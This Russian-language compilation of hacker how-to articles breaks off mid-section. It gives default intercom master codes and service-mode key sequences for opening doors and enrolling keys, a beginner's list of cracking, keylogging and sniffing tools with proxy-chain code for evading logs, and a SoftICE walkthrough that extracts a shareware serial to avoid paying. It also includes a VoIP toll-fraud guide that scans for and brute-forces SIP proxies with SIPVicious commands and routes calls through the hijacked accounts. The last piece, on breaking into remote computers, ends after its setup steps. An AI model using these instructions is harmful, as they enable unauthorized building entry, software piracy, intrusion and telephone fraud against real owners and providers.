'4'- меню '_beep'. Это опция включает/выключает сигнал открытия индивидуальным кодом квартиры в этой квартире (трубка звенит при открытии кодом по умолчанию, кнопки 1/0)
'5'- не существует
'6'- меню '_FLОС' для включения/выключения индивидуальных кодов входа для квартир (для проверки нажмите 'в' в обычном режиме, если загорелось 'F'- значит, включено)
'7'- не существует
'8'- меню '_OРЕN'- для смены длительности открытия двери ( сменится число сигналов, уменьшить/увеличить кнопками с 1 до 9)
'9'- не существует
'0'- выход

2. Серийный номер домофона.

Нажмите 'в' и держите 20 сек. Появятся 5 цифр, а затем сбросится.
3. Ввод инженерного кода (системное меню 'CODE' для работ над квартирами)
1) Наберите любую ЦИФРУ и держите до надписи 'CОDЕ', после появится поле для ввода пароля.
2) Введите системный пароль (по умолчанию 1234 как и в первом случае)
3) Если ввод правильный, то появится прошивка, затем меню '_FUNC'.
4) Из этого меню:
'1'- Установить новый пароль входа в это меню (аналогично первому случаю, см. выше)
'2'- Установить новый общий пароль для входа (4значный).
'3'- работа над паролями квартир:
'_FUNC'--> нажми '3'--> ' F'--> введи номер квартиры и нажми 'в'-->'____C'--> введи новый код (но не 0000, т.к. введя его, вы запретите использование кода для данной квартиры)--> пойдет дозвон до квартиры-->попросите нажать кнопку 'открыть дверь' ДВА раза--> код принят, '_FUNC'.
'4', '5'- меню '__ LF', но под разными цифрами скрываются разные опции.
'4'- отключение/включение отдельных трубок в квартирах. Наберите номер квартиры, затем нажмите 'в'. Появится '*** #', где ***- номер квартиры, а #- цифра 1 или 0 (вкл. или выкл.). Нажмите нужное вам значение.
'5'- кодирование ключей. Наберите номер квартиры и нажмите кнопку 'в' (см. выше). Появится '***LF', где ***- номер квартиры. Прислоните ключ к считывателю. Если вы раньше не кодировали ключ, появится надпись 'ADD', если кодировали- появится номер квартиры, на какую записан ключ. После кодировки вы можете открыть дверь этим ключом, после выхода из системы.
'6'- меню '__ dF'. Опция удаления ключей. Наберите квартиру и нажмите кнопку 'в'. Появится '_ dEL', нажмите 1- появится кол-во ключей, которые были удалены. (* dEL). Нажмите 0 для выхода в '_FUNC'.
'7', '8', '9'- не существует
'0'- выход

[KAIR]

Заводские настройки домофона Cyfral CCD-2094M
Код доступа в режим изменения параметров и настроек:
Сначала набрать 0000 и нажать "в", появится надпись "cod". Затем вводим 123456 и жмем "в". Если код подошел- появится надпись "f0"- системное меню.

VIZIT

Для открытия двери можно попробовать набрать *#423 . (подходит не всегда)
Вход в сервисный режим достаточно простой:
#999-пикнет 2 раза- вводим мастер код, по умолчанию 1234, если подошел-пикнет 1 раз
если код неправильный, то пикнет двухтональным сигналом и загорится красный светодиод.
Расшифровка операций (так как их мало в сервисном режиме, то расшифровка кнопок приведена здесь:
2-установка индивидуальных кодов для квартир
3-программирование ключей для входа
4-стирание ключей из памяти
*-выход из режима
#-подтверждение установки (сохранение изменений).
1,5,6,7,8,9,0- не существует.
Попробуй себе ключик закодировать (приведен пример, если мастер код подошел):
#999 (2 пика) 1234 (1 пик) 3 (1 пик) {номер квартиры} приложи ключ (пикнул) # а потом * .
Домофоны VIZIT имеют также специальный режим, в котором можно поменять все- даже мастер код. Переход в этот режим осуществляется из обычного состояния так (взято из инструкции):
1) отключить питание домофона
2) разъединить два провода "программирование" в центральном блоке
3) включить питание.
Как видно из вышесказанного, блок с кнопками надо снимать.

МетаКом:

На клаве набирай 65535 В (или #) на дисплее пишет COD, далее 1234 - если принял то на дисплее обозначится [ ], что означает, что ты в сервисном режиме. Теперь жми 8 и все. Домофон замурлычет, на дисплее написано OPn можно открывать дверь.
Можно также попробовать с общим кодом:
Жми В (или #) на дисплее пишет COD; далее 1234567, если не сменили, (по умолчанию) то откроется.



Всё,что нужно начинающему хакеру
Наверно практически каждый молодой человек, которому когда-то купили компьютер задавался целью стать хакером. Почему же именно молодые люди в возрасте от 14 до 20 лет хотят стать хакерами ? Из-за желания самоутвердится, из-за своего любопытства или же по причине желания заработать денег - не суть важно, речь в этой статье не об этом. Как трудно бывает начинающему хакеру разобраться во всех хитросплетениях всемирной паутины, методах взлома и т.д. и т.п.

С чего начать ? Где взять ? Что делать ? Прочитав эту статью, ты узнаешь ответы на эти и многие другие вопросы. Твой компьютер из обычного домашнего "животного" превратится в устрашающего злобных админов "монстра". Статья предназначена в первую очередь именно для начинающего хакера.

Часть первая, вступительная
Я надеюсь ты понимаешь, что если ты решил стать хакером, то уже нарушил закон РФ. Подумай, а надо тебе это ? Из-за дефейса какого-то сайта получить условный срок ? В первый раз условный, и то если ты хороший мальчик. Ты скажешь меня не поймают - ошибаешься, захотят поймают. Вопрос только во времени - когда тебя поймают. Сидеть в полутемном помещении и смотреть на здорового "быка", который кроме хука справа по челюсти и ногой в живот с разворота ничего больше не знает, не самое приятное времяпровождение. Все равно решил стать хакером? Ладно, тогда спроси себя для чего? Трудный вопрос? А ты думал.

Часть вторая, подготовительная
1. Ты наверно знаешь уже, что все сервера стоят либо на Юниксе, либо на WinNT либо на какой другой операционке, но только не на Win 9x. И, соответственно, практически все атаки на сервера происходят именно с этих двух операционных систем: Unix и WinNT. Именно поэтому ты должен поставить себе Unix. Не надо расстраиваться я понимаю, что твой папа с Юниксом не справится, ему удобней работать в "Окнах" - поэтому решений данного вопроса только два: метод первый - ставим эмулятор Юникса. Что такое эмулятор ? Эта такая программа, которая работает под одну операционную систему, но работает на другой. Т.е. тебе надо поставить себе на комп такую программу, которая запускалась бы из под Windows, но обрабатывала бы команды Юникса.

Сказано - сделано. Самые известные эмуляторы Юникса под "Окна" это Cygwin и Uwin. Если ты не знаком с программированием и с самим Юниксом, ставить CygWin не советую - не разберешься. Гораздо проще в этом случае поставить Uwin. Как это сделать ты сможешь узнать прочитав статью в Хакере за сентябрь 2000 года. Я понимаю трудно найти - но не буду же я тебе пересказывать статью. А это адрес откуда ты можешь скачать Uwin: http://www.research.att.com/sw/tools/uwin

Заходишь на сайт, давишь пимпу "Download Software", потом загрузится страничка, где тебя спросят - мол для каких целей ты себе Uwin ставишь ? Если для коммерческих, то программа будет работать всего 90 дней, потом бабки плати за лицензию. Но нам этого не надо, поэтому щелкаем на первую ссылку - и переходим на страницу выбора файлов и заполнения анкеты. В поле "Full Name" пиши свое полное имя на американский манер: Vasya V. Pupkin. Далее впиши e-mail и название своей компании: типа BigFood, что угодно, короче. Потом выбирай файл - нужные тебе только в первух двух полях, разберешься сам я думаю. Два выбранных тобой файла весят примерно, один 8.7 Мб, второй 3.8, т.е. примерно 13 Мб, а также тебе понадобится файл uwin_development.win32.i386.exe - это набор заготовок для Windows-компиляторов. Файлы в расширении exe, скачав их надо просто запустить. Произойдет распаковка архива и установка Uwin на твой комп. Вот и все. Кстати, тебе понадобится компилятор. Компилятор покупай либо Borland либо Visual Studio.

Метод второй - регистрируемся в Arbornet. Второй метод получения Юникса заключается в получения бесплатного shell'а на соответствующем сервере. Shell - это тоже самое, что и эмулятор. Различие в том, что эмулятор установлен непосредственно на твой комп, а shell стоит на удаленном серваке и предоставляет тебе возможность работать с командной строкой Юникса. Метод получения удаленного shell'a я поставил на второе место, потому что возможностей у него гораздо меньше чем, у эмулятора установленного на твоем компе. Все зависит от хозяев сервака, что они захотят тебе дать, а что нет.

Я тебе советую зарегистрироваться на Arbornet.org. Пиши в командной строке Windows telnet m-net.arbornet.org Появится окно, вводи newuser и далее пиши то, что просят. В частности твой логин, под которым ты будешь заходить, пароль, твой e-mail и твое имя. После этого ты сразу же сможешь приступать к работе. Практически все команды Юникса тебе будут доступны, практически но не все, но об этом позже. Единственное что хочу тут добавить, это то, что если тебе нужно закачать на шелл, какой-нибудь файл или файлы, например эксплоиты, то нужно запустить любой ftp-клиент, набрать адрес ftp.m-net.arbornet.org, ввести свой логин и пароль соответственно и закачать то что тебе нужно. Место тебе там дают предостаточно.

2. Потратив день, ты наконец-то скачал и поставил себе эмулятор. Что дальше ? Теперь тебе просто необходим боевой софт.

Итак что нам нужно:
- сканер:
Сканеров существует огромное количество. Они отличаются только лишь количеством функций предоставляемых юзеру. Есть сканеры многофункциональные, а есть только лишь предназначенные для выполнения одной конкретной задачи. Тебе нужен будет сканер портов, сканер для прослушки сети, сканер cgi-уязвимостей. Можно также приобрести сканер безопасности, исследует узел на наличие дыр в системе безопасности сервера.

Для Юникса:
Сканер портов:
Netcat - очень классная утилита, включает в себя многие функции и не только сканер портов. Адрес:
http://www.l0pht.com/~weld/netcat/
Nmap - эта утилита еще лучше чем netcat. Нужно брать обе эти утилиты, пригодятся. Адрес:
http://www.insecure.org/nmap

Сканер для прослушки сети:
HPing или Fping - эти две утилиты позволяют тебе определить IP-адреса компов заданного диапазона, которые в данный момент подключены к исследуемой сети. Ты конечно же можешь использовать стандартную утилиту ping, но указанные выше утилиты гораздо лучше, просто потому что включают в себя некоторые дополнительные функции. Адрес:
http://packetstorm.harvard.edu/

Для Windows все нужные тебе сканеры ты можешь найти на нашем сайте . Не забудь про сканер cgi-скриптов, для Windows могу посоветовать взять DCS, Void, TwwwScan и Stealth.

Сканер расшаренных (открытых для всех) ресурсов: тут выбор невелик - возьми лучше Legion. Адрес:
http://www.rhino9.com

Утилита Enum: необходима для исследования заданного сервера (только для серверов NT): получения списка пользователей, групп, расшаренных ресурсов, взлом пароля (подбор) с использованием словаря. Адрес:
http://razor.bindview.com

Утилиты sid2user и user2sid: в NT существует ошибка, которая позволяет удаленно узнать имя пользователя. Эти утилиты и позволят тебе это узнать. Адрес:
http://www.chem.msu.su:8080/~rudnyi/NT/

Взломщик PWL файлов: например PWLTools (эту прогу можно скачать с дримпрогса, используйте поиск). Это файлы, которые содержат пароли пользователей
Windows.

Удаленный подбор пароля: программа Brutus. Необходима для взлома пароля методом удаленного тыка.
Взлом паролей NT: программа LoPhtCrack.
Взлом паролей Unix: программа John.

Keylogger: это такие программы, которые будучи установленные на компьютере-жертвы записывают все нажатия клавиш в файл и передает его на нужный электронный адрес.

Сниффер: сниффер - это программа предназначенная для перехвата пакетов следующих от одного узла (пользователь) к другому узлу (сервер). После того как пакет получен, сниффер его отсортирует по твоему фильтру, в зависимости от того, что тебе нужно, пароли или какая другая информация. Снифферов существует огромное количество как для Unix'a, NT так и для Windows.


Защита от взлома
Многие пользуются прокси-серверами и считают при этом, что сохраняют 100%-ю анонимность. Но это не так. К сожалению, большинство бесплатных прокси принадлежат спецслужбам, которые используют их для получения информации о хакерах и других пользователях. Кроме того, очень сложно найти проксик, который не ведёт логи. А ведь логи могут выдать хакера с головой! Что же делать в такой ситуации? Есть несколько вариантов: 1. Использовать цепочку анонимных прокси-серверов. 2. Создать свой прокси на атакованном удалённом сервере. Второй способ сложнее, т.к. нам необходимо иметь под рукой "левый" сервер, админ которого ничего не подозревает. Поэтому остановимся на варианте номер 1.

Но прежде, чем приступить к использованию данного метода, рассмотрим преимущества создания цепочки прокси-серверов. Во-первых, мы не светим свой IP-адрес даже если какой-то проксик нас подведёт. А во-вторых, можно почти не бояться логов! (т.к. "распутать" цепочку прокси-серверов очень сложно, а порой невозможно:) Недостаток один - низкая скорость соединения (это не относится к тем, у кого есть "выделенка"). Впрочем, тебе решать, что важнее, особенно если от этого зависит место проживания в ближайшие пять лет:). Как создать цепочку? Просто. Для этого потребуется лишь прокси-лист:) и прога, умеющая создавать несколько последовательных соединений. Одна из таких программ - "Socks Chains", но если её у тебя нет, то ты без проблем сам напишешь аналогичную. Я сделал такую за 30 минут:) на Dark Basic:). Вот исходники:

rem "Proxy Chains v.1.0 by Ls01r"
rem: первое подключение
input "Do you want connect to proxy server? Enter IP:> ",url$
user$="" : password$=""
print "Connecting to ";url$
ftp connect url$, user$, password$

minimize window
rem: добавляем остальные подключения
success:

Эти исходники легко приспособить для платных прокси-серверов, где при подключении требуется ввести логин и пароль:

rem "Proxy Chains v.1.1 by Ls01r"
rem первое подключение
input "Do you want connect to proxy server? Enter IP:> ",url$
input "Enter login> ", user$

input "Enter password> ", password$

print "Connecting to ";url$
ftp connect url$, user$, password$

minimize window
rem:добавляем остальные подключения
success:

Если есть желание можешь запросто переколбасить мою прогу на C++ или Visual C++. Счастливого анонимного онлайн-сёрфинга:)


Сломать программу? Легко!
Вот как описывает программу автор, для перевода я использовал переводчик "Сократ полиглот" :)

*********************

Добро пожаловать в Мой Диск Загрузки!

Выигрышное Дисковое Создание первого Средства Загрузки Windows для Windows 95, Windows 98, Windows Я, Windows NT 4.0, Windows 2000 и XP Windows.

Введение

Мой Диск Загрузки создает пусковому диску с поддержкой мыши и дюжины акций и облигаций предприятий общественного пользования системного исправления, включая исправление начальной загрузки, файловое извлечение, разметка накопителя, быстрая установка, разметка диска, Внешнее оформление товара изменения, файловое удаление, архивный экземпляр, дисковое сканирование и более. Это устанавливает Windows быстрее, ищет неисправность ряды загрузки или разрушает проблемы и обнаруживает потенциальный файловый ущерб. Технология Windows NT основывала системы как например, Windows NT4, Windows 2000, Windows XP не будет из удачи. Мой Диск Загрузки обеспечивает решение загружающего Windows NT/2000/XP только одним флоппи-диск. Это позволяет, чтобы искать неисправность аварию загрузки многочисленной операционной системы и загружать аварийные случаи файлов. Мой Диск Загрузки создает как Загрузку Дисковый так и Диск Ремонта. Они обычно машинные специфические, то есть., они сделаны согласно вашей системной конфигурации. Одна из восхитительных функций программного обеспечения должны загружать стандартный Диск Загрузки из Internet, который включает МС-ДОС 5.00, МС-ДОС 6.20, МС-ДОС 6.21, МС-ДОС 6.22, Windows 95 =, Windows 95B, Windows 98, Windows 98 SE, Windows Я, Windows NT 3.51, Windows NT 4.0, Windows 2000, XP Windows. После загрузки, Вы можете включить ваше флоппи-диск и делать это согласно этому. Мой Диск Загрузки также дублирует и восстанавливает системные важные файлы, а также важные персональные файлы включая Точку зрения Экспресса почт, Книги Адреса и Т.Е. Любимую.

Характеристики

? Проблема загрузки Исправления.
? Системная авария Исправления
? Извлеките файл из CD Microsoft Windows.
? Разметка Накопителя.
? Быстрая среда установки для Microsoft Windows.
? Чистое создание установки.
? Файловый и операционный директорий
? Обнаружьте потенциальный файловый ущерб.
? Продублируйте и восстанавливайте важные системные файлы.
? Продублируйте и восстанавливайте важные персональные файлы.
? Загрузите Windows NT/2000/XP с только одним флоппи-диск.
? Загрузите ряд стандартного ФЛОППИ-ДИСК Загрузки из Internet.

*********************

Ну как? просто потрясающая программка, неправда ли :), и ещё, кто нибудь из вас юзал Windows Я?:). Ну вот отлучился я немного, время начать ломать. На сей раз нам понадобится отладчик, а именно SoftICE, где достать спросите, я подскажу - Яндекс.ру :) Так идём дальше, ну вот уже имеете SoftICE ( далее просто САЙС ), пора его установить, забегу немного вперёд, лично у меня 2 операционки ХР и 98, на обоих стоит САЙС, но я предпочитаю работать в 98, чего и вам советую, полную инфу о том, как установить отладчик ищите на cracklab.narod.ru, там много чего интересного для себя найдёте.

Так отладчик настроен и готов к использованию, теперь осталось за малым, нужна прога пациентка "My BootDisk", быстренько бежим на http://www.zhangduo.com и качаем её оттуда ( вес примерно 600кб ). Ну вот скачали, пошла инсталяция, запускаем, тут же появляется окно в котором автор пишет, что мол прога поработает 15 дней, а после истечения срока неплохо было бы заплатить всего-то каких 25 американских рублей. Щас разбежались.

Попробуем ввести произвольное имя и серийник, лично я вводил specz/1234321, жмём ОК, и тут выскакивает окно, что мы ввели неправильный регистрационный номер. Сдается мне, что это окно похоже на MessageBoxA(), но никогда нельзя гарантировать, что это именно MessageBoxA(), так как программеры бывают разные, и могут просто жутко прикольнуться :). Так, снова вводим свои атрибуты и вызываем САЙС при помощи CTRL+D. Надеюсь вы во время установки всё сделали правильно, так же отредактировали winice.dat, если нет, то будет очень жутко и неудобно ( если что, то можете взять winice.dat под 98 с моими установками, winice.dat положите в папку, куда заинсталировали САЙС ). Так теперь в отладчике пишем bpx MessageBoxA и жмём F5. Далее в нашей программе жмём ОК и вываливаемся в отладчик, теперь в отладчике жмём F12, снова появилось окно проги, в котором указывается, что мы ввели неверный номер (MessageBoxA), мы опять жмём ОК и должны появится где-то здесь в отладчике:

====х[cut here]x====
:0048A33D E87A30FCFF call 0044D3BC
:0048A342 50 push eax

* Reference To: user32.MessageBoxA, Ord:01DDh
|
:0048A343 E898D6F7FF Call 004079E0

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0048A2F2(U)
|
:0048A348 33C0 xor eax, eax ----------------------- мы находимся тут -----------------------
:0048A34A 5A pop edx
:0048A34B 59 pop ecx
:0048A34C 59 pop ecx
====х[cut here]x====

Теперь немного теории о MessageBoxA(), вот как мне объяснил MozgC " Как известно messageboxa передается 4 параметра, т.е. push xxxxxxx будет 4 раза а потом вызов messagebox’a. Push’и необязательно должны быть подряд. " Думаю здесь всё понятно, будем искать последний push, т.е. 4. Давай пролистаем вниз в отладчике при помощи мыши, надеюсь она у тебя работает, пока не наткнёмся на адрес :0048A440 54 push esp, вот он 4 push, можешь сам посмотреть и убедиться, что это после :0048A348 - 4 push. Теперь cтавим бряк на этот адрес, только уже не bpx 0048A440, a bpm 0048A440, и жмём F5. Мы снова оказались в нашей программе, снова вводим свои данные и жмём ОК, теперь оказавшись в отладчике обрати внимание на эти строки MSR LastBranchFromIP и LastBranchToIp, в них указаны адреса, которые были выполнены, прежде чем мы попали на наш push. На данный момент нас интересует MSR LastBranchFromIP с адресом 00404DBF. Теперь в САЙС сносим все брейкпоинты при помощи команды bc* и записываем новый бряк bpx 00404DBF, снова жмём F5. Так снова оказывается в нашей программе, вводим свои данные и жмём ОК, теперь мы находимся где-то здесь:

====х[cut here]x====
:00404DBB 52 push edx
:00404DBC C1EA02 shr edx, 02
:00404DBF 7426 je 00404DE7 ----------------------- этот адресс и вызывает наг скрин -----------------------

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00404DDD(C)
|
:00404DC1 8B0E mov ecx, dword ptr [esi]
====х[cut here]x====

Теперь давай немного подумаем, как вообще происходит проверка, сперва прога берёт наш введенный серийник и проверяет со сгенерированным по нашему введенному имени, если они совпадают, то нас поздравляют, и пропускают дальше, а если нет, то мы попадаем сюда, а позже на наш MessageBoxA(). Давай поищим call, т.е. поднимись немного вверх при помощи мыши или CTRL+Page Up, и увидим приблизительно вот что:

====х[cut here]x====
:00404D7C 750C jne 00404D8A
:00404D7E 85D2 test edx, edx ----------------------- а тут мы проверяем наш серийник со сгенерированным по нашему имени -----------------------
:00404D80 7403 je 00404D85
:00404D82 FF4AF8 dec [edx-08]

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00404D80(C)
|
:00404D85 E866FCFFFF call 004049F0 ----------------------- перед этим call’om и происходит проверка серийника -----------------------

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00404D7C(C)
|
:00404D8A 5A pop edx
:00404D8B 5F pop edi
====х[cut here]x====

Теперь давай взглянем чуть выше call’a и посмотрим что находится по адресу :00404DBF, достаточно 2 раза щёлкнуть мышкой по этому адресу или набрать bpx 00404DBF, перед этим удалите предыдущий бряк при помощи bd 00 ( 00 - номер брэйкпоинта, его можно узнать набрав bl ). Теперь нажмите F5, чтобы выйти из отладчика, если с первого раза не получится, то повторяйте нажимая F5. Ну вот, теперь последний рубеж, вводите своё имя и серийник, нажимаем ОК, выпадаем в отладчик, теперь пишем d EDX, для того, чтобы посмотреть что находится по этому адресу. Спросите почему именно EDX, а не EBP или ESI, просто программа написана на Дельфи и там так принято или EDX или EAX. Тогда возникает вопрос, почему не использовали bpx hmemcpy, а зачем, если так намного быстрее. Я увидел примерно такое CMW27***-*******, вместо звёздочек идут цифры, вот, это и есть серийник. Теперь можете подпрыгивать до потолка, поздравляю, вы только что сэкономили 25 баксов :), всё быстренько записываем на бумажку, вводим и воуля, никакого наг окна и напоминания о том, что прога шароварная.

Теперь можем с треском врываться на http://www.zhangduo.com, качать все проги кроме переводчиков и спокойно ломать. Теперь вот думаю в следующей статье написать как находить генерацию серийного номера и написать кейген, если The_Neption поможет с Delphi :).

P.S. Запомните все материалы публикуются только в учебных целях и автор за их использование ответственности не несет.
З.Ы. Большую благодарность хочу выразить The_Neption за понимание и MozgC, который мне очень помог, хотя встретив меня в реальной жизни наверное убил бы :)



Звонить по межгороду бесплатно
В давние времена для того, чтобы позвонить куда-либо на халяву, приходилось обманывать АТС. Это было непросто, и без знания специальной системы сигнализации №7 (Signaling System 7, SS7) рыпаться было бесполезно. Освоив огромную кипу документации, можно было по-настоящему гордиться собой и считать себя авторитетным фрикером. Существовал также вариант применения навыков социальной инженерии при общении с оператором, но и это не гарантировало результатов. Тем более постоянных. Сейчас же все изменилось и подходы стали совершенно другими.

Впрочем, и связь уже не та. Повсюду цифровые АТС, в метро - реклама многочисленных альтернативных операторов, предлагающих звонки по межгороду и за рубеж за копейки. А по сети и вовсе - звони в любые точки мира через тот же Skype. А все благодаря чему? Все благодаря технологии VoIP, с помощью которой, как выяснилось, можно звонить не только дешево, но и вообще бесплатно!

Вот оно, решение

Признаться, на возможность бесплатно звонить по межгороду я наткнулся совершенно случайно. На глаза попалась ссылка на программу, якобы позволяющую совершать звонки в другие города и страны абсолютно 4free. И если бы не пара восторженных комментариев от авторизированных пользователей, то я тут же бы определил для себя эту программу как очередное средство выманивания многочисленных паролей пользователей или тупой маркетинговый ход. Но нет. Оказалось, что по ссылке www.poivy.com действительно можно скачать некое приложение, внешний вид которого говорил о том, что позвонить с его помощью все-таки реально. Но куда, пока было неясно. Никакого намека на принадлежность к России не было, поэтому в возможность звонков на российские городские телефоны я верил с трудом. Но все-таки решил попробовать!

Как и в любой сети, для работы требовалось завести себе аккаунт. В случае с PoivY все, что нужно, - это желаемое имя пользователя, пароль и рабочий email. После этого можно пользоваться. В нижней части интерфейса есть текстовое поле; оно никак не обозначено, но по иконкам с зеленой и красной трубкой телефона несложно догадаться, что предназначено оно для ввода номера. Итак, попробуем. Я ввожу свой домашний телефон в международном формате (+7484ххххххх) и звоню.

Каково же было мое удивление, когда стоящий рядом телефон действительно запищал. я снял трубку, соединение было установлено практически моментально. Тут же начались эксперименты со звонками в Москву, Питер, Рязанскую область - куда бы я не звонил, соединение устанавливалось мгновенно. Связь на самом высоком уровне, с небольшими и вполне простительными задержками. К сожалению, радость длилась недолго, и очень скоро сервис сообщил о том, что лимит бесплатных минут исчерпан. Далее - внимание: я просто выбрал в меню «Файл -> Войти как новый пользователь» и получил новую порцию бесплатных звонков. Вот это сервис :).

Но решение с ограничениями

Без ложки дегтя, конечно, не обошлось. Самый главный недостаток этого сервиса - отсутствие возможности звонить на мобильные телефоны (забегая вперед, скажу, что для этого пришлось искать другой способ). Но зато широта всевозможных направлений бесплатных звонков впечатляет. Хотя и тут есть свои тонкости. Сразу после регистрации оператор выделяет небольшую сумму для пробного звонка (0,151 евро). Звонки с пометкой Free, то есть бесплатные, на самом деле стоят денег (пускай и ничтожных). В зависимости от выбранного направления, бесплатных разговоров с одного аккаунта может хватить на 5-30 минут. Повторная регистрация решает проблему, но лишь отчасти, потому как количество учетных записей с одного IP ограничена и каждый раз придется не только регистрировать, но еще и периодически заботиться о смене своего сетевого адреса. Выход из этой ситуации - положить на счет 10 евро. После этого у тебя в течение трех месяцев будет 300 бесплатных минут в неделю, а сами деньги ты можешь потратить на мегадешевые звонки (гораздо выгоднее именитого Skype), к примеру, на мобилы. Впрочем, на этом тонкости не заканчиваются.

Небольшое расследование

В ходе небольшого расследования выяснилось, что подобных PoivY-сервисов как минимум с десяток. Они имеют разные названия и разные клиенты, но все как один являются реселлерами (то есть обычными перепродавцами) крупной телекоммуникационной компании Betamax (www.betamax.com). Но нам это даже на руку!

У каждого из реселлеров есть свой список бесплатных направлений, зависящий от ориентированности их клиентов. Поэтому если с одного сервиса звонки в ту же Турцию платные (как, например, в случае с описанным PoivY), то есть все шансы найти оператора, который предоставляет их бесплатно. Кстати, такой действительно есть – www.12voip.com. Остается только вопрос: как найти нужного? Для этого есть специальный сайт, на котором автоматически собираются и группируются тарифы всех реселлеров. Держи его в секрете: http://backsla.sh/betamax. Для справки: сразу 16 сервисов предоставляют бесплатные звонки в Россию.

И еще один момент. Каждый из Betamax-сервисов предоставляет замечательную услугу - Direct Call, позволяющую обоим собеседникам обходиться одним только телефоном безо всякой гарнитуры. Итак, смысл в следующем. В одно из предложенных текстовых полей ты вводишь свой телефон, в другое - телефон своего собеседника, тут же нажимая кнопку «Соединить». Не пройдет и пары секунд, как раздастся телефонный звонок. Один на связи! Теперь сервис позвонит твоему собеседнику. Как только тот возьмет трубку, между вами будет установлена прямая связь. Вот так просто и эффектно. Причем состояние («идет звонок», «занято», «абонент не отвечает») ты в реальном времени можешь посмотреть на сайте (если, конечно, для звонка используешь именно его).

А как же мобилы?

Неприятное ограничение, связанное с отсутствием возможности позвонить на мобильные телефоны, заставило нас продолжить эксперименты. Новая задумка появилась довольно скоро. А почему бы самим не устроить бесплатное направление туда, куда нужно? Для того чтобы лучше понять суть идеи, давай разберемся, каким образом устроены популярные VoIP-сервисы.

Огромную роль во всей индустрии играет замечательная технология SIP (Session Initiation Protocol), отвечающая за передачу голоса, трансляцию видео и отправку факсимильных сообщений. Это не единственный протокол, используемый для передачи данных в цифровом виде, однако именно он получил наибольшее распространение за счет своей открытости. И именно его использует абсолютное большинство приложений, как клиентских для осуществления звонков пользователями, так и серверных, которые эти звонки обрабатывают.

Общая схема работы следующая. Есть клиенты, которые с помощью специальных VoIP-телефонов либо чисто программных средств (тот же Skype или Gizmo) соединяются со специальным координирующим звеном - учрежденческой АТС (в английских терминах - BPX, Private Branch eXchange). BPX управляет звонками между своими пользователями или, в случае необходимости, перенаправляет их на обычные телефоны (сотовые или городские), то есть в так называемую телефонную сеть общего пользования (PSTN, Public Switched Telephone Network). Перенаправление осуществляется за счет специальных шлюзов - SIP-прокси. Поэтому общая идея заключалась в том, чтобы найти SIP-прокси, просканировав диапазон IP-адресов, получить к ним доступ (в случае если они закрытые), а потом использовать полученные аккаунты в настроенном нами VoIP-софте. Вот тебе и бесплатные звонки.

Ищем SIP-прокси

Реализовать эту затею можно при помощи SIPVicious. Это известный набор утилит, написанных на Python, который идеально подходит для SIP-хакинга. Состоит он из нескольких приложений:

svmap - сканер SIP-устройств в сетях;

svwar – сканер активных подключений на PBX;

svcrack – пасс-крякер для SIP PBX.

Зачастую на VoIP-устройствах используются распространенные пароли, поэтому подобрать их не составляет труда. Этим когда-то воспользовался VoIP-хакер Робер Муре (Moorer). Им было украдено кредитов на 10 миллионов минут разговора общей стоимостью 1 миллион долларов. Неплохо. Однако за этим последовал его арест ФБР, но это уже другая история :), а факт остается фактом.

Итак, приступим. Качаем пакет с сайта code.google.com/p/sipvicious и с помощью интерпретатора Python запускаем сканер:
python swmap.py 10.1.1.1/24 -p(порт)-o scan.csv

Через некоторое время будет готов отчет о сканировании scan.csv, в котором мы увидить список найденных устройств для подключения. В тех же целях можно использовать никсовую утилиту smap, в этом случае команда для начала сканирования выглядит примерно так:
smap -0 -t 10.1.1./24

Двигаемся дальше. Среди найденных шлюзов большая часть, наверняка, будет запаролена, поэтому натравляем на них брутфорс (файл с паролями для перебора ты найдешь на нашем диске):
python swcrack.py хост -p(порт) -u(предположительное имя пользователя) -d (файл с паролями для перебора)

Что делать дальше

Итак, у нас есть серверы, параметры учетной записи. Что делать дальше? Нужно понять, что с помощью этих данных можно направить звонки в чужие сети, имеющие выход на PSTN-гейт, а значит, звонить фактически на любые номера! Поэтому сразу после того, как мы обзавелись SIP-аккаунтами, мы подняли свою собственную PBX, то есть небольшую АТС. Тут мы могли поступить двумя способами: либо купить дорогостоящее физическое оборудование, что для нас явно не вариант, либо же использовать программные реализации. Самым авторитетным инструментом, конечно, является никсовый Asterix, но мучиться с ним не хотелось. В наших целях был вполне пригоден его виндовый порт или решение от компании Brekeke. Последнее поставляется в практически настроенном виде, и все, что от нас требуется, - это создать нового пользователя и указать насканенный SIP-gate (Voip provider), обозначив его IP-адрес (или имя), а также порт, что, собственно, мы и сделали. В качестве программного телефона (softphone) был взят уже проверенный вариант - программа X-Lite from Xten, в которой нужно лишь указать сервер, а также параметры созданного пользователя. Готово!

Не работает!

Казалось бы: есть шлюз на PSTN, есть своя PBX, есть софтовый телефон. Звони не хочу. Но и тут есть нюансы. Во-первых, номер набирать нужно обязательно в международном формате, об этом подробно написано в журнале, во врезке. Но это ерунда по сравнению со вторым нюансом. Дело в том, что заранее определить, в какие направления разрешает переадресацию звонков взломанный SIP-прокси, мы не можем. Возможно, только в Штаты. Или только в Европу. Вполне реально, что во все направления или вообще никуда. Определить это можно фактически только методом тыка. Хотя посмотреть географию сервера (воспользовавшись сервисом www.ip2location.com) тоже не помешает. Если выяснится, что SIP-прокси находится в Германии, то есть все основания полагать, что туда-то звонки будут перенаправлены точно. С остальными странами все аналогично!

Поехали!

Запускаем X-Lite. Идет соединение с нашей BPX. Все ОК. Впрочем, по-другому и быть не может. Теперь вводим московский мобильный номер и, практически не дыша, жмем на клавишу соединения… А-а-а! Телефон на столе завибрировал, указав какой-то странный немецкий номер. Мы дозвонились!


Взлом удалённого компьютера через интернет

Постараюсь объяснить как это сделать так сказать "на пальцах", насколько у меня это получится - не знаю поскольку все это постигал сам... Прежде всего мой совет:


   1. Установите на свой компьютер Windows 2k
   2. Скачайте и установите на свой компьютер сканер Essential Net Tools v3.0
   3. Скачайте и установите на свой компьютер HakTek v1.1
   4. NEW!!! IMPORTANT!!! Не забывайте включить протокол Net BEUI и Доступ к файлам и принтерам сети Мелкософт!!
   5. В Windows 2000 это делается только в свойствах соединения, а в 9х его еще нужно поставить в свойствах сети!


Ну, пожалуй для начала взлома удаленного компьютера этого вполне достаточно. Хотя нет, скачайте с сайта http://www.pysoft.com/ звонилку Advanced Dialer, ну этого должно хватить...

Теперь некоторые объяснения предыдущих действий:

